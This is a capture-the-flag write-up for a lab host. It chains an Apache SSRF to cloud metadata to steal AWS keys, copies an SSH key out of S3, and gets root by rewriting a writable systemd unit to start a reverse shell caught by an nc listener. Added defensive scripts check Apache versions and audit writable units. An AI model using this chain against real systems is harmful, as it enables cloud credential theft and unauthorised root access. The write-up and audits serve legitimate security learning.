IAM Writeup

Enumeration

curl -I 172.16.10.21

The Apache version reported in the Server header is vulnerable to SSRF (CVE-2021-40438); a walkthrough of the bug is here:

https://firzen.de/building-a-poc-for-cve-2021-40438
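
The version check above is done by eye from the curl output. The following shell snippet is an added example, not part of the writeup, that triages a Server header against the range the Apache advisory lists for CVE-2021-40438 (Apache HTTP Server 2.4.48 and earlier) so the same check can be run over many hosts; the host names and header lines in the sample input are constructed. A version string is only a heuristic, since distributions backport fixes without changing the version, so a hit should be confirmed against the vendor advisory and the mod_proxy configuration.

```shell
# Added example, not part of the original writeup: triage the Server header
# that "curl -I" returns against the range affected by CVE-2021-40438
# (Apache HTTP Server 2.4.48 and earlier). Version strings are a heuristic:
# distributions backport fixes without changing the version, so confirm a
# hit against the vendor advisory and the mod_proxy configuration.

# Extract "major.minor.patch" from a header line such as
# "Server: Apache/2.4.48 (Ubuntu)"; prints nothing when no three-part
# Apache version is present (e.g. "Server: Apache" with ServerTokens Prod).
apache_version() {
  printf '%s\n' "$1" |
    sed -n 's/.*Apache\/\([0-9]\{1,\}\.[0-9]\{1,\}\.[0-9]\{1,\}\).*/\1/p'
}

# Exit 0 when the version is 2.4.48 or earlier, 1 when it is later,
# 2 when the header carries no usable version.
cve_2021_40438_affected() {
  ver=$(apache_version "$1")
  [ -n "$ver" ] || return 2
  printf '%s\n' "$ver" | awk -F. '{
    if ($1 < 2 || ($1 == 2 && $2 < 4) || ($1 == 2 && $2 == 4 && $3 <= 48)) exit 0
    exit 1
  }'
}

# Read "<host> <Server header>" lines on stdin (one per scanned host) and
# print a verdict per host, e.g. "web1: affected (2.4.48)".
triage_headers() {
  while IFS= read -r line; do
    host=${line%% *}
    hdr=${line#* }
    cve_2021_40438_affected "$hdr" && rc=0 || rc=$?
    case $rc in
      0) printf '%s: affected (%s)\n' "$host" "$(apache_version "$hdr")" ;;
      1) printf '%s: not in affected range (%s)\n' "$host" "$(apache_version "$hdr")" ;;
      *) printf '%s: no Apache version in header\n' "$host" ;;
    esac
  done
}

# Constructed sample input standing in for real scan output. In practice
# build each line with: printf '%s %s\n' "$host" "$(curl -sI "$host" | grep -i '^Server:')"
printf '%s\n' \
  'web1 Server: Apache/2.4.48 (Ubuntu)' \
  'web2 Server: Apache/2.4.51 (Unix)' \
  'web3 Server: nginx/1.18.0' | triage_headers
```

The awk comparison works on numeric fields, so 2.4.9 sorts below 2.4.48 as it should; a header with only "Apache/2.4" is reported as having no usable version rather than guessed at.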

Through the SSRF we walked the instance metadata paths: first the /latest directory, then /iam, then /security-credentials, and finally MACHINE_IAM_ROLE.

With that, we have access to the AWS keys.

Foothold

With the credentials, it was possible to authenticate to AWS using aws-cli.

export AWS_ACCESS_KEY_ID=
export AWS_SECRET_ACCESS_KEY=
export AWS_SESSION_TOKEN=

Listing the bucket, we can grab the first flag and the SSH key for the op user.

aws s3 ls s3://machine-iam-bucket
aws s3 cp s3://machine-iam-bucket/op-user-key.pem .
chmod 600 op-user-key.pem
ssh op@172.16.10.21 -i op-user-key.pem

Privilege Escalation

sudo -l

We can run systemctl restart httpd and systemctl daemon-reload as root without a password.

The httpd unit file is writable by our user, and since sudo lets us restart the service, that is enough to gain root on the machine.

nano /usr/lib/systemd/system/httpd.service

We modify the ExecStart line to spawn a reverse shell when we restart the service.

After that, start the listener and run sudo /bin/systemctl restart httpd; the modified unit runs as root and connects back to the listener.

nc -lnvp 1337
sudo /bin/systemctl restart httpd
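
The escalation works because a unit file that root executes is editable by an unprivileged user who is also allowed to restart it. The following shell snippet is an added example, not from the writeup, of the audit a defender would run on a host as the low-privileged account under review: it lists unit files that are group- or world-writable, and unit files whose ExecStart program is writable, which is the same problem one level down. The unit directory paths at the bottom are the standard ones and can be swapped for a test directory; the helper names are this example's own.

```shell
# Added example, not part of the original writeup: audit a host for the
# weakness used above, a systemd unit (or the program it starts) that an
# unprivileged user can edit while sudo lets that user restart it. Run it
# as the low-privileged account under review. Only group/world write bits
# are checked here; unit files should in addition be owned by root.

# Exit 0 when the path is group- or world-writable.
loose_perms() {
  [ -n "$(find "$1" \( -perm -002 -o -perm -020 \) 2>/dev/null)" ]
}

# Print every service, timer and socket unit under the given directories.
list_units() {
  for dir in "$@"; do
    [ -d "$dir" ] || continue
    find "$dir" -type f \( -name '*.service' -o -name '*.timer' -o -name '*.socket' \) 2>/dev/null
  done
}

# Print unit files that a non-root user could edit (the httpd.service case).
writable_units() {
  list_units "$@" | while IFS= read -r unit; do
    if loose_perms "$unit"; then
      printf '%s\n' "$unit"
    fi
  done
}

# Print units whose ExecStart program is writable; a writable target is as
# bad as a writable unit, since systemd runs it as root. Reads unit paths
# on stdin, as produced by list_units. Leading execution-prefix characters
# (-, @, :, +, !) are stripped before taking the first word as the program.
writable_exec_targets() {
  while IFS= read -r unit; do
    sed -n 's/^ExecStart=[-@:+!]*//p' "$unit" | while IFS= read -r cmd; do
      bin=${cmd%% *}
      [ -f "$bin" ] || continue
      if loose_perms "$bin"; then
        printf '%s: ExecStart target %s is writable\n' "$unit" "$bin"
      fi
    done
  done
}

# Full audit: both classes of finding for the given unit directories.
audit_units() {
  writable_units "$@"
  list_units "$@" | writable_exec_targets
}

# Standard unit directories; point these at a scratch directory to try it out.
audit_units /etc/systemd/system /usr/lib/systemd/system /lib/systemd/system
```

An empty result is the expected state on a healthy host. Any line it prints is a local root path once a sudo rule (or a timer the unit owns) lets the user trigger the unit, so the fix is chmod 644 and root ownership on the unit and its ExecStart target, followed by a review of what sudo permits that account to run.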